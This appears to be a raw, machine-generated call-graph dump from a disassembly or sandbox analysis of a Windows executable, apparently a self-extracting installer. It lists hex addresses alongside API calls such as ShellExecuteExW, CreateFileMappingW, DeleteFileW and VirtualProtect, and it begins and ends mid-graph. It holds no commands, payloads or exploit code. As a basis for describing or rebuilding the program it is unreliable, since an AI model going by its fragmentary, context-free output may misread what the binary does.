23929 3f6369 23927->23929 23929->23872 23930->23922 23969 3f6230 5 API calls CatchGuardHandler 23930->23969 23932 3d9ea5 23931->23932 23933 3d9e92 23931->23933 23934 3d9eb0 23932->23934 23936 3d9eb8 SetFilePointer 23932->23936 23933->23934 23970 3d6d5b 77 API calls 23933->23970 23934->23881 23936->23934 23937 3d9ed4 GetLastError 23936->23937 23937->23934 23938 3d9ede 23937->23938 23938->23934 23971 3d6d5b 77 API calls 23938->23971 23941 3d95be 23940->23941 23942 3d95cf 23940->23942 23941->23942 23943 3d95ca 23941->23943 23944 3d95d1 23941->23944 23942->23904 23972 3d974e 23943->23972 23977 3d9620 23944->23977 23948 3d9bdc 23947->23948 23950 3d9be3 23947->23950 23948->23881 23950->23948 23951 3d9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 23950->23951 23992 3d6d1a 77 API calls 23950->23992 23951->23950 23952->23881 23953->23878 23954->23901 23955->23901 23956->23901 23957->23901 23958->23901 23959->23901 23960->23888 23961->23889 23962->23890 23964 3dbb10 _wcslen 23963->23964 23965 3dbbb8 GetCurrentDirectoryW 23964->23965 23966 3dbb39 _wcslen 23964->23966 23965->23966 23966->23911 23967->23921 23968->23925 23969->23930 23970->23932 23971->23934 23973 3d9781 23972->23973 23976 3d9757 23972->23976 23973->23942 23976->23973 23983 3da1e0 23976->23983 23978 3d962c 23977->23978 23979 3d964a 23977->23979 23978->23979 23981 3d9638 FindCloseChangeNotification 23978->23981 23980 3d9669 23979->23980 23991 3d6bd5 76 API calls 23979->23991 23980->23942 23981->23979 23984 3eec50 23983->23984 23985 3da1ed DeleteFileW 23984->23985 23986 3d977f 23985->23986 23987 3da200 23985->23987 23986->23942 23988 3dbb03 GetCurrentDirectoryW 23987->23988 23989 3da214 23988->23989 23989->23986 23990 3da218 DeleteFileW 23989->23990 23990->23986 23991->23980 23992->23950 23994 3eeb3d ___std_exception_copy 23993->23994 23995 3e90d6 23994->23995 23998 3eeb59 23994->23998 24002 3f7a5e 7 API calls 2 library calls 23994->24002 23995->23530 23997 3ef5c9 24004 3f238d RaiseException 23997->24004 23998->23997 24003 3f238d RaiseException 23998->24003 24000 3ef5e6 24002->23994 24003->23997 24004->24000 24006 3f7ce1 _abort 24005->24006 24007 3f7cfa 24006->24007 24008 3f7ce8 24006->24008 24029 3fac31 EnterCriticalSection 24007->24029 24041 3f7e2f GetModuleHandleW 24008->24041 24011 3f7ced 24011->24007 24042 3f7e73 GetModuleHandleExW 24011->24042 24012 3f7d9f 24030 3f7ddf 24012->24030 24017 3f7d76 24018 3f7d8e 24017->24018 24023 3f8a91 _abort 5 API calls 24017->24023 24024 3f8a91 _abort 5 API calls 24018->24024 24019 3f7d01 24019->24012 24019->24017 24050 3f87e0 20 API calls _abort 24019->24050 24020 3f7dbc 24033 3f7dee 24020->24033 24021 3f7de8 24051 402390 5 API calls CatchGuardHandler 24021->24051 24023->24018 24024->24012 24029->24019 24052 3fac81 LeaveCriticalSection 24030->24052 24032 3f7db8 24032->24020 24032->24021 24053 3fb076 24033->24053 24036 3f7e1c 24039 3f7e73 _abort 8 API calls 24036->24039 24037 3f7dfc GetPEB 24037->24036 24038 3f7e0c GetCurrentProcess TerminateProcess 24037->24038 24038->24036 24040 3f7e24 ExitProcess 24039->24040 24041->24011 24043 3f7e9d GetProcAddress 24042->24043 24044 3f7ec0 24042->24044 24047 3f7eb2 24043->24047 24045 3f7ecf 24044->24045 24046 3f7ec6 FreeLibrary 24044->24046 24048 3efbbc CatchGuardHandler 5 API calls 24045->24048 24046->24045 24047->24044 24049 3f7cf9 24048->24049 24049->24007 24050->24017 24052->24032 24054 3fb09b 24053->24054 24058 3fb091 24053->24058 24059 3fac98 24054->24059 24056 3efbbc CatchGuardHandler 5 API calls 24057 3f7df8 24056->24057 24057->24036 24057->24037 24058->24056 24060 3facc4 24059->24060 24061 3facc8 24059->24061 24060->24061 24065 3face8 24060->24065 24066 3fad34 24060->24066 24061->24058 24063 3facf4 GetProcAddress 24064 3fad04 _abort 24063->24064 24064->24061 24065->24061 24065->24063 24067 3fad55 LoadLibraryExW 24066->24067 24068 3fad4a 24066->24068 24069 3fad8a 24067->24069 24070 3fad72 GetLastError 24067->24070 24068->24060 24069->24068 24072 3fada1 FreeLibrary 24069->24072 24070->24069 24071 3fad7d LoadLibraryExW 24070->24071 24071->24069 24072->24068 25430 3eb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24073 3ee5b1 24074 3ee578 24073->24074 24076 3ee85d 24074->24076 24102 3ee5bb 24076->24102 24078 3ee86d 24079 3ee8ee 24078->24079 24080 3ee8ca 24078->24080 24083 3ee966 LoadLibraryExA 24079->24083 24085 3ee9c7 24079->24085 24086 3ee9d9 24079->24086 24097 3eea95 24079->24097 24081 3ee7fb DloadReleaseSectionWriteAccess 6 API calls 24080->24081 24082 3ee8d5 RaiseException 24081->24082 24098 3eeac3 24082->24098 24084 3ee979 GetLastError 24083->24084 24083->24085 24087 3ee98c 24084->24087 24088 3ee9a2 24084->24088 24085->24086 24090 3ee9d2 FreeLibrary 24085->24090 24089 3eea37 GetProcAddress 24086->24089 24086->24097 24087->24085 24087->24088 24091 3ee7fb DloadReleaseSectionWriteAccess 6 API calls 24088->24091 24092 3eea47 GetLastError 24089->24092 24089->24097 24090->24086 24093 3ee9ad RaiseException 24091->24093 24094 3eea5a 24092->24094 24093->24098 24096 3ee7fb DloadReleaseSectionWriteAccess 6 API calls 24094->24096 24094->24097 24099 3eea7b RaiseException 24096->24099 24111 3ee7fb 24097->24111 24098->24074 24100 3ee5bb ___delayLoadHelper2@8 6 API calls 24099->24100 24101 3eea92 24100->24101 24101->24097 24103 3ee5ed 24102->24103 24104 3ee5c7 24102->24104 24103->24078 24119 3ee664 24104->24119 24106 3ee5cc 24107 3ee5e8 24106->24107 24122 3ee78d 24106->24122 24127 3ee5ee GetModuleHandleW GetProcAddress GetProcAddress 24107->24127 24110 3ee836 24110->24078 24112 3ee82f 24111->24112 24113 3ee80d 24111->24113 24112->24098 24114 3ee664 DloadReleaseSectionWriteAccess 3 API calls 24113->24114 24115 3ee812 24114->24115 24116 3ee82a 24115->24116 24117 3ee78d DloadProtectSection 3 API calls 24115->24117 24130 3ee831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24116->24130 24117->24116 24128 3ee5ee GetModuleHandleW GetProcAddress GetProcAddress 24119->24128 24121 3ee669 24121->24106 24124 3ee7a2 DloadProtectSection 24122->24124 24123 3ee7a8 24123->24107 24124->24123 24125 3ee7dd VirtualProtect 24124->24125 24129 3ee6a3 VirtualQuery GetSystemInfo 24124->24129 24125->24123 24127->24110 24128->24121 24129->24125 24130->24112 25432 402bd0 VariantClear 25434 3d6faa 111 API calls 3 library calls 25435 3eeda7 48 API calls _unexpected 24271 3ef3a0 24276 3ef9d5 SetUnhandledExceptionFilter 24271->24276 24273 3ef3a5 24277 3f8c3a 26 API calls 2 library calls 24273->24277 24275 3ef3b0 24276->24273 24277->24275 25386 3fa4a0 71 API calls _free 25387 3edca1 DialogBoxParamW 25388 3fa6a0 31 API calls 2 library calls 25436 3eb18d 78 API calls 25390 3ec793 97 API calls 4 library calls 25391 3ec793 102 API calls 5 library calls 25439 3e9580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25393 3f2cfb 38 API calls 4 library calls 25395 3d5ef0 82 API calls 25441 3d95f0 80 API calls 24320 3f98f0 24328 3fadaf 24320->24328 24323 3f9904 24325 3f990c 24326 3f9919 24325->24326 24336 3f9920 11 API calls 24325->24336 24329 3fac98 _abort 5 API calls 24328->24329 24330 3fadd6 24329->24330 24331 3fadee TlsAlloc 24330->24331 24332 3faddf 24330->24332 24331->24332 24333 3efbbc CatchGuardHandler 5 API calls 24332->24333 24334 3f98fa 24333->24334 24334->24323 24335 3f9869 20 API calls 2 library calls 24334->24335 24335->24325 24336->24323 24337 3fabf0 24338 3fabfb 24337->24338 24340 3fac24 24338->24340 24342 3fac20 24338->24342 24343 3faf0a 24338->24343 24350 3fac50 DeleteCriticalSection 24340->24350 24344 3fac98 _abort 5 API calls 24343->24344 24345 3faf31 24344->24345 24346 3faf4f InitializeCriticalSectionAndSpinCount 24345->24346 24347 3faf3a 24345->24347 24346->24347 24348 3efbbc CatchGuardHandler 5 API calls 24347->24348 24349 3faf66 24348->24349 24349->24338 24350->24342 25396 3f88f0 7 API calls ___scrt_uninitialize_crt 25443 3efd4f 9 API calls 2 library calls 25445 3df1e8 FreeLibrary 24357 3eeae7 24358 3eeaf1 24357->24358 24359 3ee85d ___delayLoadHelper2@8 14 API calls 24358->24359 24360 3eeafe 24359->24360 25397 3ef4e7 29 API calls _abort 24362 3d13e1 84 API calls 2 library calls 24363 3eb7e0 24364 3eb7ea __EH_prolog 24363->24364 24531 3d1316 24364->24531 24367 3eb841 24368 3ebf0f 24596 3ed69e 24368->24596 24369 3eb82a 24369->24367 24371 3eb89b 24369->24371 24372 3eb838 24369->24372 24378 3eb92e GetDlgItemTextW 24371->24378 24382 3eb8b1 24371->24382 24374 3eb83c 24372->24374 24375 3eb878 24372->24375 24374->24367 24384 3de617 53 API calls 24374->24384 24375->24367 24386 3eb95f EndDialog 24375->24386 24376 3ebf2a SendMessageW 24377 3ebf38 24376->24377 24379 3ebf52 GetDlgItem SendMessageW 24377->24379 24380 3ebf41 SendDlgItemMessageW 24377->24380 24378->24375 24381 3eb96b 24378->24381 24614 3ea64d GetCurrentDirectoryW 24379->24614 24380->24379 24387 3eb980 GetDlgItem 24381->24387 24529 3eb974 24381->24529 24383 3de617 53 API calls 24382->24383 24390 3eb8ce SetDlgItemTextW 24383->24390 24391 3eb85b 24384->24391 24386->24367 24388 3eb9b7 SetFocus 24387->24388 24389 3eb994 SendMessageW SendMessageW 24387->24389 24393 3eb9c7 24388->24393 24408 3eb9e0 24388->24408 24389->24388 24394 3eb8d9 24390->24394 24634 3d124f SHGetMalloc 24391->24634 24392 3ebf82 GetDlgItem 24396 3ebf9f 24392->24396 24397 3ebfa5 SetWindowTextW 24392->24397 24398 3de617 53 API calls 24393->24398 24394->24367 24402 3eb8e6 GetMessageW 24394->24402 24396->24397 24615 3eabab GetClassNameW 24397->24615 24403 3eb9d1 24398->24403 24399 3eb862 24399->24367 24409 3ec1fc SetDlgItemTextW 24399->24409 24400 3ebe55 24404 3de617 53 API calls 24400->24404 24402->24367 24406 3eb8fd IsDialogMessageW 24402->24406 24635 3ed4d4 24403->24635 24410 3ebe65 SetDlgItemTextW 24404->24410 24406->24394 24412 3eb90c TranslateMessage DispatchMessageW 24406->24412 24415 3de617 53 API calls 24408->24415 24409->24367 24413 3ebe79 24410->24413 24412->24394 24416 3de617 53 API calls 24413->24416 24418 3eba17 24415->24418 24452 3ebe9c _wcslen 24416->24452 24417 3ebff0 24421 3ec020 24417->24421 24424 3de617 53 API calls 24417->24424 24423 3d4092 _swprintf 51 API calls 24418->24423 24419 3ec73f 97 API calls 24419->24417 24420 3eb9d9 24541 3da0b1 24420->24541 24432 3ec73f 97 API calls 24421->24432 24475 3ec0d8 24421->24475 24426 3eba29 24423->24426 24429 3ec003 SetDlgItemTextW 24424->24429 24428 3ed4d4 16 API calls 24426->24428 24427 3ec18b 24433 3ec19d 24427->24433 24434 3ec194 EnableWindow 24427->24434 24428->24420 24436 3de617 53 API calls 24429->24436 24430 3eba73 24547 3eac04 SetCurrentDirectoryW 24430->24547 24431 3eba68 GetLastError 24431->24430 24438 3ec03b 24432->24438 24439 3ec1ba 24433->24439 24653 3d12d3 GetDlgItem EnableWindow 24433->24653 24434->24433 24435 3ebeed 24442 3de617 53 API calls 24435->24442 24440 3ec017 SetDlgItemTextW 24436->24440 24448 3ec04d 24438->24448 24472 3ec072 24438->24472 24445 3ec1e1 24439->24445 24456 3ec1d9 SendMessageW 24439->24456 24440->24421 24441 3eba87 24446 3eba90 GetLastError 24441->24446 24447 3eba9e 24441->24447 24442->24367 24443 3ec0cb 24453 3ec73f 97 API calls 24443->24453 24445->24367 24457 3de617 53 API calls 24445->24457 24446->24447 24449 3ebb11 24447->24449 24458 3ebaae GetTickCount 24447->24458 24459 3ebb20 24447->24459 24651 3e9ed5 32 API calls 24448->24651 24449->24459 24461 3ebd56 24449->24461 24451 3ec1b0 24654 3d12d3 GetDlgItem EnableWindow 24451->24654 24452->24435 24460 3de617 53 API calls 24452->24460 24453->24475 24454 3ec066 24454->24472 24456->24445 24457->24399 24465 3d4092 _swprintf 51 API calls 24458->24465 24462 3ebb39 GetModuleFileNameW 24459->24462 24463 3ebcf1 24459->24463 24468 3ebcfb 24459->24468 24466 3ebed0 24460->24466 24556 3d12f1 GetDlgItem ShowWindow 24461->24556 24645 3df28c 82 API calls 24462->24645 24463->24375 24463->24468 24474 3ebac7 24465->24474 24476 3d4092 _swprintf 51 API calls 24466->24476 24467 3ec169 24652 3e9ed5 32 API calls 24467->24652 24471 3de617 53 API calls 24468->24471 24479 3ebd05 24471->24479 24472->24443 24480 3ec73f 97 API calls 24472->24480 24473 3ebd66 24557 3d12f1 GetDlgItem ShowWindow 24473->24557 24548 3d966e 24474->24548 24475->24427 24475->24467 24482 3de617 53 API calls 24475->24482 24476->24435 24477 3ec188 24477->24427 24478 3ebb5f 24483 3d4092 _swprintf 51 API calls 24478->24483 24484 3d4092 _swprintf 51 API calls 24479->24484 24485 3ec0a0 24480->24485 24482->24475 24487 3ebb81 CreateFileMappingW 24483->24487 24488 3ebd23 24484->24488 24485->24443 24489 3ec0a9 DialogBoxParamW 24485->24489 24486 3ebd70 24490 3de617 53 API calls 24486->24490 24492 3ebbe3 GetCommandLineW 24487->24492 24523 3ebc60 __InternalCxxFrameHandler 24487->24523 24501 3de617 53 API calls 24488->24501 24489->24375 24489->24443 24493 3ebd7a SetDlgItemTextW 24490->24493 24495 3ebbf4 24492->24495 24558 3d12f1 GetDlgItem ShowWindow 24493->24558 24494 3ebaed 24498 3ebaf4 GetLastError 24494->24498 24499 3ebaff 24494->24499 24646 3eb425 SHGetMalloc 24495->24646 24496 3ebc6b ShellExecuteExW 24521 3ebc88 24496->24521 24498->24499 24503 3d959a 80 API calls 24499->24503 24505 3ebd3d 24501->24505 24502 3ebd8c SetDlgItemTextW GetDlgItem 24506 3ebda9 GetWindowLongW SetWindowLongW 24502->24506 24507 3ebdc1 24502->24507 24503->24449 24504 3ebc10 24647 3eb425 SHGetMalloc 24504->24647 24506->24507 24559 3ec73f 24507->24559 24510 3ebc1c 24648 3eb425 SHGetMalloc 24510->24648 24513 3ebccb 24513->24463 24517 3ebce1 UnmapViewOfFile CloseHandle 24513->24517 24514 3ec73f 97 API calls 24516 3ebddd 24514->24516 24515 3ebc28 24649 3df3fa 82 API calls 2 library calls 24515->24649 24584 3eda52 24516->24584 24517->24463 24520 3ebc3f MapViewOfFile 24520->24523 24521->24513 24524 3ebcb7 Sleep 24521->24524 24523->24496 24524->24513 24524->24521 24525 3ec73f 97 API calls 24528 3ebe03 24525->24528 24526 3ebe2c 24650 3d12d3 GetDlgItem EnableWindow 24526->24650 24528->24526 24530 3ec73f 97 API calls 24528->24530 24529->24375 24529->24400 24530->24526 24532 3d1378 24531->24532 24533 3d131f 24531->24533 24656 3de2c1 GetWindowLongW SetWindowLongW 24532->24656 24534 3d1385 24533->24534 24655 3de2e8 62 API calls 2 library calls 24533->24655 24534->24367 24534->24368 24534->24369 24537 3d1341 24537->24534 24538 3d1354 GetDlgItem 24537->24538 24538->24534 24539 3d1364 24538->24539 24539->24534 24540 3d136a SetWindowTextW 24539->24540 24540->24534 24543 3da0bb 24541->24543 24542 3da14c 24544 3da2b2 8 API calls 24542->24544 24546 3da175 24542->24546 24543->24542 24543->24546 24657 3da2b2 24543->24657 24544->24546 24546->24430 24546->24431 24547->24441 24549 3d9678 24548->24549 24550 3d96d5 CreateFileW 24549->24550 24551 3d96c9 24549->24551 24550->24551 24552 3d971f 24551->24552 24553 3dbb03 GetCurrentDirectoryW 24551->24553 24552->24494 24554 3d9704 24553->24554 24554->24552 24555 3d9708 CreateFileW 24554->24555 24555->24552 24556->24473 24557->24486 24558->24502 24560 3ec749 __EH_prolog 24559->24560 24561 3ebdcf 24560->24561 24689 3eb314 24560->24689 24561->24514 24564 3eb314 ExpandEnvironmentStringsW 24570 3ec780 _wcslen _wcsrchr 24564->24570 24565 3eca67 SetWindowTextW 24565->24570 24570->24561 24570->24564 24570->24565 24571 3ec855 SetFileAttributesW 24570->24571 24576 3ecc31 GetDlgItem SetWindowTextW SendMessageW 24570->24576 24579 3ecc71 SendMessageW 24570->24579 24693 3e1fbb CompareStringW 24570->24693 24694 3ea64d GetCurrentDirectoryW 24570->24694 24696 3da5d1 6 API calls 24570->24696 24697 3da55a FindClose 24570->24697 24698 3eb48e 76 API calls 2 library calls 24570->24698 24699 3f3e3e 24570->24699 24573 3ec90f GetFileAttributesW 24571->24573 24583 3ec86f __cftof _wcslen 24571->24583 24573->24570 24575 3ec921 DeleteFileW 24573->24575 24575->24570 24577 3ec932 24575->24577 24576->24570 24578 3d4092 _swprintf 51 API calls 24577->24578 24580 3ec952 GetFileAttributesW 24578->24580 24579->24570 24580->24577 24581 3ec967 MoveFileW 24580->24581 24581->24570 24582 3ec97f MoveFileExW 24581->24582 24582->24570 24583->24570 24583->24573 24695 3db991 51 API calls 3 library calls 24583->24695 24585 3eda5c __EH_prolog 24584->24585 24714 3e0659 24585->24714 24587 3eda8d 24718 3d5b3d 24587->24718 24589 3edaab 24722 3d7b0d 24589->24722 24593 3edafe 24738 3d7b9e 24593->24738 24595 3ebdee 24595->24525 24597 3ed6a8 24596->24597 24598 3ea5c6 4 API calls 24597->24598 24599 3ed6ad 24598->24599 24600 3ebf15 24599->24600 24601 3ed6b5 GetWindow 24599->24601 24600->24376 24600->24377 24601->24600 24606 3ed6d5 24601->24606 24602 3ed6e2 GetClassNameW 25241 3e1fbb CompareStringW 24602->25241 24604 3ed76a GetWindow 24604->24600 24604->24606 24605 3ed706 GetWindowLongW 24605->24604 24607 3ed716 SendMessageW 24605->24607 24606->24600 24606->24602 24606->24604 24606->24605 24607->24604 24608 3ed72c GetObjectW 24607->24608 25242 3ea605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24608->25242 24610 3ed743 25243 3ea5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24610->25243 25244 3ea80c 8 API calls 24610->25244 24613 3ed754 SendMessageW DeleteObject 24613->24604 24614->24392 24616 3eabcc 24615->24616 24620 3eabf1 24615->24620 25245 3e1fbb CompareStringW 24616->25245 24618 3eabdf 24619 3eabe3 FindWindowExW 24618->24619 24618->24620 24619->24620 24621 3eb093 24620->24621 24622 3eb09d __EH_prolog 24621->24622 24623 3d13dc 84 API calls 24622->24623 24624 3eb0bf 24623->24624 25246 3d1fdc 24624->25246 24627 3eb0eb 24630 3d19af 128 API calls 24627->24630 24628 3eb0d9 24629 3d1692 86 API calls 24628->24629 24631 3eb0e4 24629->24631 24633 3eb10d __InternalCxxFrameHandler ___std_exception_copy 24630->24633 24631->24417 24631->24419 24632 3d1692 86 API calls 24632->24631 24633->24632 24634->24399 25254 3eb568 PeekMessageW 24635->25254 24638 3ed536 SendMessageW SendMessageW 24640 3ed572 24638->24640 24641 3ed591 SendMessageW SendMessageW SendMessageW 24638->24641 24639 3ed502 24642 3ed50d ShowWindow SendMessageW SendMessageW 24639->24642 24640->24641 24643 3ed5e7 SendMessageW 24641->24643 24644 3ed5c4 SendMessageW 24641->24644 24642->24638 24643->24420 24644->24643 24645->24478 24646->24504 24647->24510 24648->24515 24649->24520 24650->24529 24651->24454 24652->24477 24653->24451 24654->24439 24655->24537 24656->24534 24658 3da2bf 24657->24658 24659 3da2e3 24658->24659 24661 3da2d6 CreateDirectoryW 24658->24661 24678 3da231 24659->24678 24661->24659 24663 3da316 24661->24663 24667 3da325 24663->24667 24670 3da4ed 24663->24670 24664 3da329 GetLastError 24664->24667 24665 3dbb03 GetCurrentDirectoryW 24668 3da2ff 24665->24668 24667->24543 24668->24664 24669 3da303 CreateDirectoryW 24668->24669 24669->24663 24669->24664 24671 3eec50 24670->24671 24672 3da4fa SetFileAttributesW 24671->24672 24673 3da53d 24672->24673 24674 3da510 24672->24674 24673->24667 24675 3dbb03 GetCurrentDirectoryW 24674->24675 24676 3da524 24675->24676 24676->24673 24677 3da528 SetFileAttributesW 24676->24677 24677->24673 24681 3da243 24678->24681 24682 3eec50 24681->24682 24683 3da250 GetFileAttributesW 24682->24683 24684 3da23a 24683->24684 24685 3da261 24683->24685 24684->24664 24684->24665 24686 3dbb03 GetCurrentDirectoryW 24685->24686 24687 3da275 24686->24687 24687->24684 24688 3da279 GetFileAttributesW 24687->24688 24688->24684 24690 3eb31e 24689->24690 24691 3eb3f0 ExpandEnvironmentStringsW 24690->24691 24692 3eb40d 24690->24692 24691->24692 24692->24570 24693->24570 24694->24570 24695->24583 24696->24570 24697->24570 24698->24570 24700 3f8e54 24699->24700 24701 3f8e6c 24700->24701 24702 3f8e61 24700->24702 24704 3f8e74 24701->24704 24710 3f8e7d _abort 24701->24710 24703 3f8e06 __vsnwprintf_l 21 API calls 24702->24703 24708 3f8e69 24703->24708 24705 3f8dcc _free 20 API calls 24704->24705 24705->24708 24706 3f8ea7 RtlReAllocateHeap 24706->24708 24706->24710 24707 3f8e82 24712 3f91a8 20 API calls _abort 24707->24712 24708->24570 24710->24706 24710->24707 24713 3f7a5e 7 API calls 2 library calls 24710->24713 24712->24708 24713->24710 24715 3e0666 _wcslen 24714->24715 24742 3d17e9 24715->24742 24717 3e067e 24717->24587 24719 3e0659 _wcslen 24718->24719 24720 3d17e9 78 API calls 24719->24720 24721 3e067e 24720->24721 24721->24589 24723 3d7b17 __EH_prolog 24722->24723 24759 3dce40 24723->24759 24725 3d7b32 24726 3eeb38 8 API calls 24725->24726 24727 3d7b5c 24726->24727 24765 3e4a76 24727->24765 24730 3d7c7d 24731 3d7c87 24730->24731 24733 3d7cf1 24731->24733 24794 3da56d 24731->24794 24736 3d7d50 24733->24736 24772 3d8284 24733->24772 24734 3d7d92 24734->24593 24736->24734 24800 3d138b 74 API calls 24736->24800 24739 3d7bac 24738->24739 24741 3d7bb3 24738->24741 24740 3e2297 86 API calls 24739->24740 24740->24741 24743 3d17ff 24742->24743 24754 3d185a __InternalCxxFrameHandler 24742->24754 24744 3d1828 24743->24744 24755 3d6c36 76 API calls __vswprintf_c_l 24743->24755 24746 3d1887 24744->24746 24751 3d1847 ___std_exception_copy 24744->24751 24748 3f3e3e 22 API calls 24746->24748 24747 3d181e 24756 3d6ca7 75 API calls 24747->24756 24750 3d188e 24748->24750 24750->24754 24758 3d6ca7 75 API calls 24750->24758 24751->24754 24757 3d6ca7 75 API calls 24751->24757 24754->24717 24755->24747 24756->24744 24757->24754 24758->24754 24760 3dce4a __EH_prolog 24759->24760 24761 3eeb38 8 API calls 24760->24761 24762 3dce8d 24761->24762 24763 3eeb38 8 API calls 24762->24763 24764 3dceb1 24763->24764 24764->24725 24766 3e4a80 __EH_prolog 24765->24766 24767 3eeb38 8 API calls 24766->24767 24768 3e4a9c 24767->24768 24769 3d7b8b 24768->24769 24771 3e0e46 80 API calls 24768->24771 24769->24730 24771->24769 24773 3d828e __EH_prolog 24772->24773 24801 3d13dc 24773->24801 24775 3d82aa 24776 3d82bb 24775->24776 24944 3d9f42 24775->24944 24779 3d82f2 24776->24779 24809 3d1a04 24776->24809 24940 3d1692 24779->24940 24782 3d8389 24828 3d8430 24782->24828 24786 3d83e8 24836 3d1f6d 24786->24836 24789 3d82ee 24789->24779 24789->24782 24792 3da56d 7 API calls 24789->24792 24948 3dc0c5 CompareStringW _wcslen 24789->24948 24790 3d83f3 24790->24779 24840 3d3b2d 24790->24840 24852 3d848e 24790->24852 24792->24789 24795 3da582 24794->24795 24799 3da5b0 24795->24799 25230 3da69b 24795->25230 24797 3da592 24798 3da597 FindClose 24797->24798 24797->24799 24798->24799 24799->24731 24800->24734 24802 3d13e1 __EH_prolog 24801->24802 24803 3dce40 8 API calls 24802->24803 24804 3d1419 24803->24804 24805 3eeb38 8 API calls 24804->24805 24808 3d1474 __cftof 24804->24808 24806 3d1461 24805->24806 24806->24808 24949 3db505 24806->24949 24808->24775 24810 3d1a0e __EH_prolog 24809->24810 24822 3d1b9b 24810->24822 24823 3d1a61 24810->24823 24965 3d13ba 24810->24965 24812 3d1bc7 24968 3d138b 74 API calls 24812->24968 24815 3d3b2d 101 API calls 24819 3d1c12 24815->24819 24816 3d1bd4 24816->24815 24816->24822 24817 3d1c5a 24821 3d1c8d 24817->24821 24817->24822 24969 3d138b 74 API calls 24817->24969 24819->24817 24820 3d3b2d 101 API calls 24819->24820 24820->24819 24821->24822 24826 3d9e80 79 API calls 24821->24826 24822->24789 24823->24812 24823->24816 24823->24822 24824 3d3b2d 101 API calls 24825 3d1cde 24824->24825 24825->24822 24825->24824 24826->24825 24827 3d9e80 79 API calls 24827->24823 24987 3dcf3d 24828->24987 24830 3d8440 24991 3e13d2 GetSystemTime SystemTimeToFileTime 24830->24991 24832 3d83a3 24832->24786 24833 3e1b66 24832->24833 24992 3ede6b 24833->24992 24837 3d1f72 __EH_prolog 24836->24837 24839 3d1fa6 24837->24839 25000 3d19af 24837->25000 24839->24790 24841 3d3b3d 24840->24841 24842 3d3b39 24840->24842 24851 3d9e80 79 API calls 24841->24851 24842->24790 24843 3d3b4f 24844 3d3b78 24843->24844 24845 3d3b6a 24843->24845 25154 3d286b 101 API calls 3 library calls 24844->25154 24846 3d3baa 24845->24846 25153 3d32f7 89 API calls 2 library calls 24845->25153 24846->24790 24849 3d3b76 24849->24846 25155 3d20d7 74 API calls 24849->25155 24851->24843 24853 3d8498 __EH_prolog 24852->24853 24858 3d84d5 24853->24858 24863 3d8513 24853->24863 25180 3e8c8d 103 API calls 24853->25180 24855 3d84f5 24856 3d851c 24855->24856 24857 3d84fa 24855->24857 24856->24863 25182 3e8c8d 103 API calls 24856->25182 24857->24863 25181 3d7a0d 152 API calls 24857->25181 24858->24855 24862 3d857a 24858->24862 24858->24863 24862->24863 25156 3d5d1a 24862->25156 24863->24790 24864 3d8605 24864->24863 25162 3d8167 24864->25162 24867 3d8797 24868 3da56d 7 API calls 24867->24868 24869 3d8802 24867->24869 24868->24869 25168 3d7c0d 24869->25168 24871 3dd051 82 API calls 24877 3d885d 24871->24877 24872 3d898b 25185 3d2021 74 API calls 24872->25185 24873 3d8992 24874 3d8a5f 24873->24874 24880 3d89e1 24873->24880 24878 3d8ab6 24874->24878 24891 3d8a6a 24874->24891 24877->24863 24877->24871 24877->24872 24877->24873 25183 3d8117 84 API calls 24877->25183 25184 3d2021 74 API calls 24877->25184 24884 3d8a4c 24878->24884 25188 3d7fc0 97 API calls 24878->25188 24879 3d8ab4 24885 3d959a 80 API calls 24879->24885 24881 3d8b14 24880->24881 24880->24884 24886 3da231 3 API calls 24880->24886 24899 3d8b82 24881->24899 24928 3d9105 24881->24928 25189 3d98bc 24881->25189 24883 3d959a 80 API calls 24883->24863 24884->24879 24884->24881 24885->24863 24887 3d8a19 24886->24887 24887->24884 25186 3d92a3 97 API calls 24887->25186 24889 3dab1a 8 API calls 24892 3d8bd1 24889->24892 24891->24879 25187 3d7db2 101 API calls 24891->25187 24893 3dab1a 8 API calls 24892->24893 24900 3d8be7 24893->24900 24897 3d8b70 25193 3d6e98 77 API calls 24897->25193 24899->24889 24901 3d8cbc 24900->24901 24913 3d8c93 24900->24913 24919 3d981a 79 API calls 24900->24919 24902 3d8d18 24901->24902 24903 3d8e40 24901->24903 24904 3d8d8a 24902->24904 24905 3d8d28 24902->24905 24906 3d8e66 24903->24906 24907 3d8e52 24903->24907 24925 3d8d49 24903->24925 24910 3d8167 19 API calls 24904->24910 24912 3d8d6e 24905->24912 24915 3d8d37 24905->24915 24909 3e3377 75 API calls 24906->24909 24908 3d9215 123 API calls 24907->24908 24908->24925 24911 3d8e7f 24909->24911 24914 3d8dbd 24910->24914 24917 3e3020 123 API calls 24911->24917 24912->24925 25196 3d77b8 111 API calls 24912->25196 24913->24901 25194 3d9a3c 82 API calls 24913->25194 24921 3d8df5 24914->24921 24922 3d8de6 24914->24922 24914->24925 25195 3d2021 74 API calls 24915->25195 24917->24925 24919->24913 25198 3d9155 93 API calls __EH_prolog 24921->25198 25197 3d7542 85 API calls 24922->25197 24929 3d8f85 24925->24929 25199 3d2021 74 API calls 24925->25199 24927 3d9090 24927->24928 24930 3da4ed 3 API calls 24927->24930 24928->24883 24929->24927 24929->24928 24931 3d903e 24929->24931 25174 3d9f09 SetEndOfFile 24929->25174 24934 3d90eb 24930->24934 25175 3d9da2 24931->25175 24934->24928 25200 3d2021 74 API calls 24934->25200 24935 3d9085 24937 3d9620 77 API calls 24935->24937 24937->24927 24938 3d90fb 25201 3d6dcb 76 API calls _wcschr 24938->25201 24941 3d16a4 24940->24941 25217 3dcee1 24941->25217 24945 3d9f59 24944->24945 24946 3d9f63 24945->24946 25229 3d6d0c 78 API calls 24945->25229 24946->24776 24948->24789 24950 3db50f __EH_prolog 24949->24950 24955 3df1d0 82 API calls 24950->24955 24952 3db521 24956 3db61e 24952->24956 24955->24952 24957 3db630 __cftof 24956->24957 24960 3e10dc 24957->24960 24963 3e109e GetCurrentProcess GetProcessAffinityMask 24960->24963 24964 3db597 24963->24964 24964->24808 24970 3d1732 24965->24970 24967 3d13d6 24967->24827 24968->24822 24969->24821 24971 3d1748 24970->24971 24982 3d17a0 __InternalCxxFrameHandler 24970->24982 24972 3d1771 24971->24972 24983 3d6c36 76 API calls __vswprintf_c_l 24971->24983 24973 3d17c7 24972->24973 24979 3d178d ___std_exception_copy 24972->24979 24975 3f3e3e 